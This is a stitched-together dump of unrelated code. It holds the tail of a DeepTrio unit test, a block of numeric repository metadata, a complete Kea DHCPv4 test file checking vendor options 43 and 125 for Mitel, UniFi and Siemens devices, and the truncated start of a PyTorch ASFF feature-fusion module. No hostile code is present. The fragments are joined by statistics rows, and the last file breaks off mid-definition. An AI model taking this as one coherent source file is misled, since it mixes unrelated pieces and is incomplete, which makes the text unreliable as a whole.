    FLAGS.output_gvcf_child = 'your_gvcf_child'
    FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
    FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
    FLAGS.num_shards = 64
    FLAGS.vcf_stats_report = vcf_stats_report
    FLAGS.postprocess_variants_extra_args = postprocess_variants_extra_args
    _, commands_post_process = run_deeptrio.create_all_commands(
        '/tmp/deeptrio_tmp_output')
    self.assertEqual(
        commands_post_process[0],
        'time /opt/deepvariant/bin/postprocess_variants '
        '--ref "your_ref" '
        '--infile '
        '"/tmp/deeptrio_tmp_output/call_variants_output_child.tfrecord.gz" '
        '--outfile "your_vcf_child" '
        '--nonvariant_site_tfrecord_path '
        '"/tmp/deeptrio_tmp_output/gvcf_child.tfrecord@64.gz" '
        '--gvcf_outfile "your_gvcf_child" '
        '%s' % expected_vcf_stats_report)
# Run the absltest test driver when this file is executed as a script.
if __name__ == '__main__':
  absltest.main()
| 44.599659
| 85
| 0.700076
| 3,291
| 26,180
| 5.164388
| 0.103616
| 0.044658
| 0.036244
| 0.051777
| 0.825606
| 0.802659
| 0.790009
| 0.776653
| 0.769828
| 0.738997
| 0
| 0.023534
| 0.190107
| 26,180
| 586
| 86
| 44.675768
| 0.77805
| 0.076623
| 0
| 0.806513
| 0
| 0
| 0.439819
| 0.209461
| 0
| 0
| 0
| 0
| 0.049808
| 1
| 0.024904
| false
| 0
| 0.015326
| 0
| 0.044061
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b717073da77a0968e1ff451213c990ebcc1eb911
| 20,015
|
py
|
Python
|
tests/dhcpv4/options/test_v4_vendor_options.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 22
|
2015-02-27T11:51:05.000Z
|
2022-02-28T12:39:29.000Z
|
tests/dhcpv4/options/test_v4_vendor_options.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 16
|
2018-10-30T15:00:12.000Z
|
2019-01-11T17:55:13.000Z
|
tests/dhcpv4/options/test_v4_vendor_options.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 11
|
2015-02-27T11:51:36.000Z
|
2021-03-30T08:33:54.000Z
|
"""DHCPv4 vendor specific information"""
# pylint: disable=invalid-name,line-too-long
import pytest
import srv_control
import srv_msg
import misc
from forge_cfg import world
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vendor_encapsulated_space():
    """Server returns option 43 built from a custom suboption.

    Defines suboption 'foo' (code 1, uint16, value 66) inside
    vendor-encapsulated-options-space and checks the packed bytes of
    option 43 in the OFFER.
    """
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
    srv_control.config_srv_custom_opt_space('vendor-encapsulated-options-space',
                                            'foo',
                                            1,
                                            'uint16',
                                            66)
    # Send option 43 itself empty; its content comes from the encapsulated space.
    srv_control.config_srv_opt('vendor-encapsulated-options', '$(EMPTY)')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
    srv_msg.client_requests_option(43)
    srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
    srv_msg.client_send_msg('DISCOVER')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_content('yiaddr', '192.168.50.50')
    srv_msg.response_check_include_option(43)
    # option 43 should have suboption code: 1 length: 2 with value 66 (hex:42)
    srv_msg.response_check_option_content(43, 'value', 'HEX:01020042')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
@pytest.mark.private
def test_v4_options_vendor_encapsulated_space_private_iPXE():
    """Option 43 content selected per client class (APC vs PXE).

    Two client classes match on option[vendor-class-identifier].text and each
    redefines option 43 to encapsulate its own private option space, so the
    same DISCOVER gets different option 43 bytes depending on the vendor
    class the client sends.
    """
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
    # Private spaces: 'cookie' (string) in space APC, 'mtftp-ip'
    # (ipv4-address) in space PXE.
    srv_control.config_srv_custom_opt_space('APC', 'cookie', 1, 'string', 'global-value')
    srv_control.config_srv_custom_opt_space('PXE', 'mtftp-ip', 1, 'ipv4-address', '0.0.0.0')
    srv_control.create_new_class('APC')
    srv_control.add_test_to_class(1, 'test', 'option[vendor-class-identifier].text == \'APC\'')
    srv_control.add_test_to_class(1,
                                  'option-def',
                                  {"name": "vendor-encapsulated-options", "code": 43,
                                   "type": "empty", "encapsulate": "APC"})
    srv_control.add_test_to_class(1,
                                  'option-data',
                                  {"name": "cookie", "space": "APC", "data": "1APC"})
    srv_control.add_test_to_class(1,
                                  'option-data',
                                  {"name": "vendor-encapsulated-options"})
    srv_control.create_new_class('PXE')
    srv_control.add_test_to_class(2, 'test', 'option[vendor-class-identifier].text == \'PXE\'')
    srv_control.add_test_to_class(2,
                                  'option-def',
                                  {"name": "vendor-encapsulated-options", "code": 43,
                                   "type": "empty", "encapsulate": "PXE"})
    srv_control.add_test_to_class(2,
                                  'option-data',
                                  {"name": "mtftp-ip", "space": "PXE", "data": "1.2.3.4"})
    srv_control.add_test_to_class(2,
                                  'option-data',
                                  {"name": "vendor-encapsulated-options"})
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    # Exchange 1: client advertises vendor class PXE.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
    srv_msg.client_requests_option(43)
    srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
    srv_msg.client_does_include_with_value('vendor_class_id', 'PXE')
    srv_msg.client_send_msg('DISCOVER')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(43)
    # option 43 should have suboption code: 1 length: 4 with value(v4 address) 1.2.3.4
    srv_msg.response_check_option_content(43, 'value', 'HEX:010401020304')
    # Exchange 2: same client, vendor class APC, gets the APC content instead.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
    srv_msg.client_requests_option(43)
    srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
    srv_msg.client_does_include_with_value('vendor_class_id', 'APC')
    srv_msg.client_send_msg('DISCOVER')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(43)
    # option 43 should have suboption code: 1 length: 4 with value 1APC hex:31415043, entire option 43 has length 6
    srv_msg.response_check_option_content(43, 'value', 'HEX:010431415043')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vivso_suboptions_mitel():
    """Mitel configuration string delivered via vivso option 125.

    Defines a string suboption (code 130) in space vendor-1027 and checks
    the packed bytes of option 125 for a client in VENDOR_CLASS_1027.
    """
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
    option = [{"array": False, "code": 130, "encapsulate": "", "name": "mitel-option",
               "record-types": "", "space": "vendor-1027", "type": "string"}]
    # always-send so the suboption goes out even without an explicit request.
    my_class = [{"name": "VENDOR_CLASS_1027",
                 "option-data": [{"name": "vivso-suboptions", "data": "1027"},
                                 {"name": "mitel-option", "space": "vendor-1027",
                                  "data": "id:ipphone.mitel.com;sw_tftp=11.11.11.11;call_srv=10.10.10.10",
                                  "always-send": True}]}]
    world.dhcp_cfg["option-def"] = option
    world.dhcp_cfg["client-classes"] = my_class
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
    srv_msg.client_requests_option(125)
    srv_msg.client_does_include_with_value('vendor_class_id', '1027')
    srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
    srv_msg.client_send_msg('DISCOVER')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_content('yiaddr', '192.168.50.50')
    srv_msg.response_check_include_option(125)
    srv_msg.response_check_option_content(125, 'value', 'HEX:000004033F823D69643A697070686F6E652E6D6974656C2E636F6D3B73775F746674703D31312E31312E31312E31313B63616C6C5F7372763D31302E31302E31302E3130')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vendor_encapsulated_mitel():
    """Mitel configuration string delivered via option 43 as a raw string.

    The client class redefines option 43 with type "string" and supplies the
    Mitel config directly, so the OFFER carries it unstructured.
    """
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
    my_class = [{"name": "VENDOR_CLASS_1027",
                 "option-def": [{"name": "vendor-encapsulated-options",
                                 "code": 43, "type": "string"}],
                 "option-data": [{"name": "vendor-encapsulated-options",
                                 "data": "id:ipphone.mitel.com;sw_tftp=11.11.11.11;call_srv=10.10.10.10"}]}]
    world.dhcp_cfg["client-classes"] = my_class
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
    srv_msg.client_requests_option(43)
    srv_msg.client_does_include_with_value('vendor_class_id', '1027')
    srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
    srv_msg.client_send_msg('DISCOVER')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_content('yiaddr', '192.168.50.50')
    srv_msg.response_check_include_option(43)
    srv_msg.response_check_option_content(43, 'value', 'HEX:69643A697070686F6E652E6D6974656C2E636F6D3B73775F746674703D31312E31312E31312E31313B63616C6C5F7372763D31302E31302E31302E3130')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vendor_encapsulated_unifi_address():
    """UniFi controller address delivered via option 43 as an ipv4-address.

    For vendor class 'ubnt', option 43 is redefined as a bare ipv4-address
    and should contain 192.0.2.11 (hex C000020B).
    """
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
    my_class = [{"name": "VENDOR_CLASS_ubnt",
                 "option-def": [{"name": "vendor-encapsulated-options",
                                 "type": "ipv4-address", "code": 43}],
                 "option-data": [{"name": "vendor-encapsulated-options",
                                 "data": "192.0.2.11"}]}]
    world.dhcp_cfg["client-classes"] = my_class
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
    srv_msg.client_requests_option(43)
    srv_msg.client_does_include_with_value('vendor_class_id', 'ubnt')
    srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
    srv_msg.client_send_msg('DISCOVER')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_content('yiaddr', '192.168.50.50')
    srv_msg.response_check_include_option(43)
    srv_msg.response_check_option_content(43, 'value', 'HEX:C000020B')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vivso_suboptions_unifi_address():
    """UniFi controller address delivered via vivso option 125.

    Defines suboption 'unifi-address' (code 1, ipv4-address) in space
    vendor-41112 and checks the packed option 125 bytes for a client in
    VENDOR_CLASS_41112.
    """
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
    option = [{"name": "unifi-address", "code": 1, "array": False,
               "space": "vendor-41112", "type": "ipv4-address"}]
    # always-send so the suboption goes out even without an explicit request.
    my_class = [{"name": "VENDOR_CLASS_41112",
                 "option-data": [
                     {"name": "vivso-suboptions", "data": "41112"},
                     {"name": "unifi-address", "space": "vendor-41112",
                      "data": "192.0.2.11", "always-send": True}]}]
    world.dhcp_cfg["option-def"] = option
    world.dhcp_cfg["client-classes"] = my_class
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
    srv_msg.client_requests_option(125)
    srv_msg.client_does_include_with_value('vendor_class_id', '41112')
    srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
    srv_msg.client_send_msg('DISCOVER')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_content('yiaddr', '192.168.50.50')
    srv_msg.response_check_include_option(125)
    srv_msg.response_check_option_content(125, 'value', 'HEX:0000A098060104C000020B')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vendor_encapsulated_siemens():
    """Siemens phone settings delivered via option 43 encapsulating space 339.

    Defines suboptions 'vlanid' (code 2, uint32) and 'dls' (code 3, string)
    in space "339"; option 43 is redefined as empty and encapsulates that
    space for clients in VENDOR_CLASS_339.
    """
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
    option = [{"name": "vlanid", "code": 2, "array": False,
               "encapsulate": "", "record-types": "",
               "space": "339", "type": "uint32"},
              {"name": "dls", "code": 3, "array": False,
               "encapsulate": "", "record-types": "",
               "space": "339", "type": "string"}]
    # always-send so both suboptions go out even without an explicit request.
    my_class = [{"name": "VENDOR_CLASS_339",
                 "option-def": [{"name": "vendor-encapsulated-options", "code": 43,
                                 "type": "empty", "encapsulate": "339"}],
                 "option-data": [{"name": "vendor-encapsulated-options"},
                                 {"always-send": True, "data": "123",
                                  "name": "vlanid", "space": "339"},
                                 {"always-send": True, "data": "sdlp://192.0.2.11:18443",
                                  "name": "dls", "space": "339"}]}]
    world.dhcp_cfg["option-def"] = option
    world.dhcp_cfg["client-classes"] = my_class
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
    srv_msg.client_requests_option(43)
    srv_msg.client_does_include_with_value('vendor_class_id', '339')
    srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
    srv_msg.client_send_msg('DISCOVER')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_content('yiaddr', '192.168.50.50')
    srv_msg.response_check_include_option(43)
    srv_msg.response_check_option_content(43, 'value', 'HEX:02040000007B031773646C703A2F2F3139322E302E322E31313A3138343433')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vivso_suboptions_siemens():
    """The OFFER must carry option 125 (vivso-suboptions) with the Siemens
    vlanid/dls suboptions defined in the vendor-339 option space."""
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
    # Global definitions of the two suboptions carried in vendor-339.
    world.dhcp_cfg["option-def"] = [
        {"name": "vlanid", "code": 2, "array": False,
         "encapsulate": "", "record-types": "",
         "space": "vendor-339", "type": "uint32"},
        {"name": "dls", "code": 3, "array": False,
         "encapsulate": "", "record-types": "",
         "space": "vendor-339", "type": "string"}]
    world.dhcp_cfg["client-classes"] = [
        {"name": "VENDOR_CLASS_339",
         "option-data": [{"name": "vivso-suboptions", "data": "339"},
                         {"always-send": True, "data": "123",
                          "name": "vlanid", "space": "vendor-339"},
                         {"always-send": True, "data": "sdlp://192.0.2.11:18443",
                          "name": "dls", "space": "vendor-339"}]}]
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')

    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
    srv_msg.client_requests_option(125)
    srv_msg.client_does_include_with_value('vendor_class_id', '339')
    srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_content('yiaddr', '192.168.50.50')
    srv_msg.response_check_include_option(125)
    # 00000153 = enterprise 339, 1F = data length 31, then the same
    # vlanid/dls payload as the option-43 variant of this test.
    srv_msg.response_check_option_content(125, 'value', 'HEX:000001531F02040000007B031773646C703A2F2F3139322E302E322E31313A3138343433')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vivso_suboptions_siemens_defined_in_class():
    """Like test_v4_options_vivso_suboptions_siemens, but the suboption
    definitions live inside the client class instead of globally."""
    # kea gitlab #1683
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
    suboption_defs = [
        {"name": "vlanid", "code": 2, "array": False,
         "encapsulate": "", "record-types": "",
         "space": "vendor-339", "type": "uint32"},
        {"name": "dls", "code": 3, "array": False,
         "encapsulate": "", "record-types": "",
         "space": "vendor-339", "type": "string"}]
    world.dhcp_cfg["client-classes"] = [
        {"name": "VENDOR_CLASS_339",
         "option-def": suboption_defs,
         "option-data": [{"name": "vivso-suboptions", "data": "339"},
                         {"always-send": True, "data": "123",
                          "name": "vlanid", "space": "vendor-339"},
                         {"always-send": True, "data": "sdlp://192.0.2.11:18443",
                          "name": "dls", "space": "vendor-339"}]}]
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')

    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
    srv_msg.client_requests_option(125)
    srv_msg.client_does_include_with_value('vendor_class_id', '339')
    srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_content('yiaddr', '192.168.50.50')
    srv_msg.response_check_include_option(125)
    # 00000153 = enterprise 339, 1F = data length, then vlanid=123 and
    # dls="sdlp://192.0.2.11:18443".
    srv_msg.response_check_option_content(125, 'value', 'HEX:000001531F02040000007B031773646C703A2F2F3139322E302E322E31313A3138343433')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vendor_encapsulated_siemens_defined_in_class():
    """Like test_v4_options_vendor_encapsulated_siemens, but both the
    option-43 redefinition and the suboption definitions live inside
    the client class instead of globally."""
    # kea gitlab #1683
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
    suboption_defs = [
        {"name": "vlanid", "code": 2, "array": False,
         "encapsulate": "", "record-types": "",
         "space": "339", "type": "uint32"},
        {"name": "dls", "code": 3, "array": False,
         "encapsulate": "", "record-types": "",
         "space": "339", "type": "string"}]
    world.dhcp_cfg["client-classes"] = [
        {"name": "VENDOR_CLASS_339",
         "option-def": [{"name": "vendor-encapsulated-options", "code": 43,
                         "type": "empty", "encapsulate": "339"},
                        *suboption_defs],
         "option-data": [{"name": "vendor-encapsulated-options"},
                         {"always-send": True, "data": "123",
                          "name": "vlanid", "space": "339"},
                         {"always-send": True, "data": "sdlp://192.0.2.11:18443",
                          "name": "dls", "space": "339"}]}]
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')

    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
    srv_msg.client_requests_option(43)
    srv_msg.client_does_include_with_value('vendor_class_id', '339')
    srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_content('yiaddr', '192.168.50.50')
    srv_msg.response_check_include_option(43)
    # 02 04 0000007B = vlanid 123; 03 17 ... = "sdlp://192.0.2.11:18443".
    srv_msg.response_check_option_content(43, 'value', 'HEX:02040000007B031773646C703A2F2F3139322E302E322E31313A3138343433')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vendor_encapsulated_options_space_siemens():
    """The OFFER must carry option 43 with suboptions defined directly in
    the predefined vendor-encapsulated-options-space."""
    # kea gitlab #1682
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
    # Global definitions of the two suboptions; no custom encapsulated
    # space is needed because the predefined one is used.
    world.dhcp_cfg["option-def"] = [
        {"name": "vlanid", "code": 2, "array": False,
         "encapsulate": "", "record-types": "",
         "space": "vendor-encapsulated-options-space", "type": "uint32"},
        {"name": "dls", "code": 3, "array": False,
         "encapsulate": "", "record-types": "",
         "space": "vendor-encapsulated-options-space", "type": "string"}]
    world.dhcp_cfg["client-classes"] = [
        {"name": "VENDOR_CLASS_339",
         "option-def": [{"name": "vendor-encapsulated-options", "code": 43,
                         "type": "empty"}],
         "option-data": [{"name": "vendor-encapsulated-options"},
                         {"always-send": True, "data": "123", "name": "vlanid",
                          "space": "vendor-encapsulated-options-space"},
                         {"always-send": True, "data": "sdlp://192.0.2.11:18443", "name": "dls",
                          "space": "vendor-encapsulated-options-space"}]}]
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')

    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
    srv_msg.client_requests_option(43)
    srv_msg.client_does_include_with_value('vendor_class_id', '339')
    srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_content('yiaddr', '192.168.50.50')
    srv_msg.response_check_include_option(43)
    # 02 04 0000007B = vlanid 123; 03 17 ... = "sdlp://192.0.2.11:18443".
    srv_msg.response_check_option_content(43, 'value', 'HEX:02040000007B031773646C703A2F2F3139322E302E322E31313A3138343433')
| 43.416486
| 199
| 0.628329
| 2,566
| 20,015
| 4.606391
| 0.063523
| 0.053807
| 0.059898
| 0.054653
| 0.915651
| 0.901777
| 0.887563
| 0.87022
| 0.860406
| 0.836125
| 0
| 0.108512
| 0.211741
| 20,015
| 460
| 200
| 43.51087
| 0.640679
| 0.019485
| 0
| 0.803867
| 0
| 0.005525
| 0.297093
| 0.106782
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030387
| false
| 0.033149
| 0.013812
| 0
| 0.044199
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b736b3afaf63c5f284a48d5c41b15a2fd8466f86
| 13,096
|
py
|
Python
|
nb/torch/blocks/asff_blocks.py
|
jinfagang/nb
|
2b46577c2252a4fc28232faf8973088192bdd096
|
[
"Apache-2.0"
] | 161
|
2020-09-11T08:17:13.000Z
|
2022-03-29T01:48:17.000Z
|
nb/torch/blocks/asff_blocks.py
|
yangdeai/nb
|
9e81bd96310a3fdad8553a9910e18b7a6accee7a
|
[
"Apache-2.0"
] | 7
|
2020-12-04T12:43:48.000Z
|
2021-07-30T05:21:19.000Z
|
nb/torch/blocks/asff_blocks.py
|
yangdeai/nb
|
9e81bd96310a3fdad8553a9910e18b7a6accee7a
|
[
"Apache-2.0"
] | 36
|
2020-09-15T02:48:16.000Z
|
2022-03-24T06:56:16.000Z
|
import torch
import math
import torch.nn as nn
import torch.nn.functional as F
from .conv_blocks import ConvBase
"""
ASFF blocks which better than RFBnet
code token from: https://github.com/ruinmessi/ASFF/blob/master/models/network_blocks.py
with some our own modifications
"""
class ASFFmobile(nn.Module):
    """Adaptively Spatial Feature Fusion (ASFF) module, mobile variant.

    Takes three feature-pyramid levels with 512/256/128 channels (level 0
    being the coarsest/smallest spatial map), resizes all of them to the
    resolution of ``level``, and fuses them with per-pixel softmax weights.
    ``act_cfg`` defaults to ReLU6 — presumably the activation config used
    by ConvBase (defined elsewhere); confirm against conv_blocks.
    """
    def __init__(self, level, rfb=False, vis=False, act_cfg=dict(type='ReLU6')):
        # level: which pyramid level (0, 1 or 2) this module outputs at.
        # rfb:   halve the weight-branch channels to save memory.
        # vis:   if True, forward() also returns the fusion weights.
        # NOTE(review): the mutable dict default for act_cfg is shared
        # across calls — safe only if ConvBase never mutates it.
        super(ASFFmobile, self).__init__()
        self.level = level
        # Input channel counts per level, index 0 = coarsest.
        self.dim = [512, 256, 128]
        self.inter_dim = self.dim[self.level]
        if level == 0:
            # Downsample the two finer levels with stride-2 3x3 convs.
            self.stride_level_1 = ConvBase(
                256, self.inter_dim, 3, 2, act_cfg=act_cfg)
            self.stride_level_2 = ConvBase(
                128, self.inter_dim, 3, 2, act_cfg=act_cfg)
            self.expand = ConvBase(self.inter_dim, 1024, 3, 1, act_cfg=act_cfg)
        elif level == 1:
            # Compress level-0 channels with a 1x1 conv; downsample level 2.
            self.compress_level_0 = ConvBase(
                512, self.inter_dim, 1, 1, act_cfg=act_cfg)
            self.stride_level_2 = ConvBase(
                128, self.inter_dim, 3, 2, act_cfg=act_cfg)
            self.expand = ConvBase(self.inter_dim, 512, 3, 1, act_cfg=act_cfg)
        elif level == 2:
            # Compress both coarser levels down to level 2's channel count.
            self.compress_level_0 = ConvBase(
                512, self.inter_dim, 1, 1, act_cfg=act_cfg)
            self.compress_level_1 = ConvBase(
                256, self.inter_dim, 1, 1, act_cfg=act_cfg)
            self.expand = ConvBase(self.inter_dim, 256, 3, 1, act_cfg=act_cfg)
        # when adding rfb, we use half number of channels to save memory
        compress_c = 8 if rfb else 16
        # One weight branch per level, then a 1x1 conv that produces the
        # three (pre-softmax) fusion-weight maps.
        self.weight_level_0 = ConvBase(
            self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
        self.weight_level_1 = ConvBase(
            self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
        self.weight_level_2 = ConvBase(
            self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
        self.weight_levels = nn.Conv2d(
            compress_c*3, 3, kernel_size=1, stride=1, padding=0)
        self.vis = vis
    def forward(self, x_level_0, x_level_1, x_level_2):
        """Resize all inputs to ``self.level``'s resolution, fuse them with
        per-pixel softmax weights, and expand the channel count.

        Returns the fused map, plus the weights and the channel-summed
        pre-expand map when ``self.vis`` is set.
        """
        if self.level == 0:
            level_0_resized = x_level_0
            level_1_resized = self.stride_level_1(x_level_1)
            # Max-pool first so a single stride-2 conv bridges the 4x gap
            # between level 2 and level 0.
            level_2_downsampled_inter = F.max_pool2d(
                x_level_2, 3, stride=2, padding=1)
            level_2_resized = self.stride_level_2(level_2_downsampled_inter)
        elif self.level == 1:
            level_0_compressed = self.compress_level_0(x_level_0)
            level_0_resized = F.interpolate(
                level_0_compressed, scale_factor=2, mode='nearest')
            level_1_resized = x_level_1
            level_2_resized = self.stride_level_2(x_level_2)
        elif self.level == 2:
            level_0_compressed = self.compress_level_0(x_level_0)
            level_0_resized = F.interpolate(
                level_0_compressed, scale_factor=4, mode='nearest')
            level_1_compressed = self.compress_level_1(x_level_1)
            level_1_resized = F.interpolate(
                level_1_compressed, scale_factor=2, mode='nearest')
            level_2_resized = x_level_2
        level_0_weight_v = self.weight_level_0(level_0_resized)
        level_1_weight_v = self.weight_level_1(level_1_resized)
        level_2_weight_v = self.weight_level_2(level_2_resized)
        levels_weight_v = torch.cat(
            (level_0_weight_v, level_1_weight_v, level_2_weight_v), 1)
        levels_weight = self.weight_levels(levels_weight_v)
        # Per-pixel convex combination over the three levels.
        levels_weight = F.softmax(levels_weight, dim=1)
        fused_out_reduced = level_0_resized * levels_weight[:, 0:1, :, :] +\
            level_1_resized * levels_weight[:, 1:2, :, :] +\
            level_2_resized * levels_weight[:, 2:, :, :]
        out = self.expand(fused_out_reduced)
        if self.vis:
            return out, levels_weight, fused_out_reduced.sum(dim=1)
        else:
            return out
class ASFF(nn.Module):
    """Adaptively Spatial Feature Fusion (ASFF) over three pyramid levels.

    Resizes all three inputs to the resolution of ``level`` and fuses them
    with per-pixel softmax weights before a final 3x3 "expand" conv.
    """
    def __init__(self, level, multiplier=1, rfb=False, vis=False, act_cfg=dict(type='LeakyReLU')):
        """
        normally, multiplier should be 1, 0.5
        which means, the channel of ASFF can be
        512, 256, 256 -> multiplier=1
        256, 128, 128 -> multiplier=0.5
        For even smaller, you gonna need change code manually.
        If you got any question about this, consult me via wechat: jintianiloveu
        """
        super(ASFF, self).__init__()
        self.level = level
        # Input channel counts per level, index 0 = coarsest.
        self.dim = [int(512*multiplier), int(256*multiplier),
                    int(256*multiplier)]
        self.inter_dim = self.dim[self.level]
        if level == 0:
            # Downsample the two finer levels with stride-2 3x3 convs.
            self.stride_level_1 = ConvBase(
                int(256*multiplier), self.inter_dim, 3, 2, act_cfg=act_cfg)
            self.stride_level_2 = ConvBase(
                int(256*multiplier), self.inter_dim, 3, 2, act_cfg=act_cfg)
            self.expand = ConvBase(self.inter_dim, int(
                1024*multiplier), 3, 1, act_cfg=act_cfg)
        elif level == 1:
            self.compress_level_0 = ConvBase(
                int(512*multiplier), self.inter_dim, 1, 1, act_cfg=act_cfg)
            self.stride_level_2 = ConvBase(
